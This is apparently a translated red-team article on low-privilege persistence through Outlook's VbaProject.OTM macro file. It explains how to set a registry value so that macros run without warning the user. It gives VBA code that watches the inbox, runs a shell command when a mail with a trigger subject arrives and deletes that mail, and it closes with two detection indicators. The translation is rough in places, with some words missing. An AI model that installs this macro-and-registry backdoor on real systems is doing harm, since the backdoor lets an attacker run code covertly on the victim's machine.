persistence

Persistence method of low authority based on Outlook mail

In this article, we focus on analyzing the Outlook persistence technology we recently discovered. So far, this technology has not been paid attention to by too many blue teams.

0x00 overview

The use of low-privileged users to establish persistence technology in the user space is often very valuable, because there are far more scenarios like this than scenarios with elevated privileges. Therefore, we continue to research some new technologies that are not widely documented and may not be monitored by the blue team. Last year, we published 3 persistence-related articles, and in this article, we continue to discuss persistence technology, focusing on the analysis of the Outlook persistence technology we recently discovered. So far, this technology has not been paid attention to by too many blue teams.

Previously, many researchers have conducted research on the topic of Outlook-based persistence, including Dave Hartley and Nick Landers, who have introduced in detail how to use Outlook rules to achieve persistence.

In this article, we will focus on using Outlook’s VbsProject.OTM file to achieve similar results. Although the technology has not spread too widely, Cobalt Kitty has previously used it for command and control channels.

0x01 analysis

Like most Microsoft Office product suites, Outlook can enable the “Developer” tab and create VBA-based macros through the VB editor. We open the editor and create a simple to find an Outlook specific module named “ThisOutlookSession”.

outlook macro

After saving the macro, Outlook will create the VbaProject.OTM file in the %APPDATA%\Roaming\Microsoft\Outlook directory.

outlook file

However, if we try to execute the with the default configuration, a failure prompt will appear because the default configuration is set to “provide notifications for digitally signed macros, and disable all other macros”.

However, we can modify this configuration by using the following values ​​to create a Security registry key.

outlook regedit

In the security configuration, the Level value is defined as follows:

4 = No notification is provided, all macros are disabled

3 = Provide notification for digitally signed macros, disable all other macros

2 = Provide notifications for all macros

1 = enable all macros

To allow macros to run in a hidden manner without notifying the user, we may need to set the Level value to 1, and enable all macros during operation.

Checking the VbaProject.OTM file, we found that it is a standard Microsoft Compound Document File (CDF):

[email protected] ~  βœ— file ~/VbaProject.OTM

VbaProject.OTM: Composite Document File V2 Document, Cannot read section info

Using oledump.py to further analyze it, you can find the OLE stream containing the code:

[email protected] ~  βœ— python oledump.py ~/VbaProject.OTM   1:        43 'OutlookProjectData'   2:       388 'OutlookVbaData/PROJECT'   3:        59 'OutlookVbaData/PROJECTwm'   4: M    6156 'OutlookVbaData/VBA/ThisOutlookSession'   5:      2663 'OutlookVbaData/VBA/_VBA_PROJECT'   6: 497 'OutlookVbaData / VBA / dir'

At this point, we now know that VbaProject.OTM is a standard document that enables OLE macros, so the traditional tools and techniques for creating, obfuscating, purging, and reloading these files are still applicable. When we deliver it to disk, we may need to ensure its static security.

Next, let us take a closer look at how to use it as a weaponized persistence tool.

0x02 Weaponization

In order to make VBA code execution more meaningful, the code needs to be executed as a result of an event. The ThisOutlookSession module allows us to subscribe to many different events in Outlook, which will lead to different opportunities to implement code execution.

Discussed here is the persistence method, which may involve certain events driven by the user (for example: opening Outlook) or certain events determined by the attacker (for example: receiving a specific email). Here, we will focus on the latter and explain how to implement arbitrary VBA execution using emails with specific topics.

In order to determine when to receive new emails, we can first subscribe to the events of the default inbox when Outlook starts, using the following methods. First, when registering for an event, set variables for the default inbox folder (olInboxItems).

Option Explicit
Private WithEvents olInboxItems As Items
Private Sub Application_Startup()     Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).Items
End Sub

Then, using the user’s reference to the inbox, we can use the “ItemAdd” callback function to receive events when new mail is received:

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)
End Sub

Specifically, we are only interested in received emails, so we can optimize the callback so that it only triggers when new emails are received. This can be achieved by verifying the entry to confirm whether its type is “MailItem”.

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)      If TypeOf Item Is MailItem Then         MsgBox "You have mail"     End If
End Sub

Of course, we don’t want to execute it every time we receive an email, so we can use specific conditions to filter the received emails, including sender address, subject, body content, etc. Here, the above code is extended. When an email with a specific subject (MailItem.Subject) is received, the code is executed, and then the email is deleted using the MailItem.Delete method.

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)     On Error Resume Next     Dim olMailItem As MailItem     If TypeOf Item Is MailItem Then        If InStr(olMailItem.Subject, "MDSec") > 0 Then             MsgBox "Hack The Planet"             olMailItem.Delete         End If     End If     Set Item = Nothing     Set olMailItem = Nothing
End Sub

Combine the above codes together and finally pop up the calculator.

Option Explicit   Private WithEvents olInboxItems As Items   Private Sub Application_Startup()     Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).Items
End Sub   Private Sub olInboxItems_ItemAdd(ByVal Item As Object)     On Error Resume Next     Dim olMailItem As MailItem     If TypeOf Item Is MailItem Then        If InStr(olMailItem.Subject, "MDSec") > 0 Then             MsgBox "Hack The Planet"             Shell "calc.exe"             olMailItem.Delete         End If     End If     Set Item = Nothing     Set olMailItem = Nothing
End Sub

Demo video: https://vimeo.com/482370663

The pop-up calculator is just a proof of concept. In fact, a can be generated by weaponization. The specific implementation is left for readers to try.

Demo video: https://vimeo.com/482376266

0x03 detection

From the perspective of terminal security, the technology can be tested through the following two key indicators:

1. Monitoring the creation and modification events of %APPDATA%\Roaming\Microsoft\Outlook\VbaProject.OTM file (Sysmon event ID 11);

2. Monitoring the creation and modification events of the registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security key and Level value (Sysmon event ID 12).